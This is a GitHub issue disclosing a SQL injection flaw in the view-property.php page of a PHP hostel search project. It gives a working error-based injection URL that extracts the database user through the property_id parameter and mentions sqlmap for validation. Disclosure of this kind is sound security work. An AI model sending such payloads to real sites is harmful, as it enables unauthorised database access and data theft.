Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability exists in Hostel searching project #1

Closed
huclilu opened this issue Nov 17, 2022 · 0 comments
Closed

SQL injection vulnerability exists in Hostel searching project #1

huclilu opened this issue Nov 17, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Nov 17, 2022

SQL injection vulnerability exists in Hostel searching project

1.Build environment

Aapche2.4.39; MySQL5.7.26; PHP8.0.2

2.Vulnerability analysis

view-property.php:

property_ ID is assigned to $property_ The ID variable is then brought into the database for query, and the query result is returned. During this process, the property_ The ID is brought into the database without being filtered, thus creating a SQL injection vulnerability

  • We can use sqlmap to validate

  • Manual SQL injection proof

3.POC

http://127.0.0.1/view-property.php?property_id=127' or (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace
@huclilu huclilu closed this as completed Nov 18, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant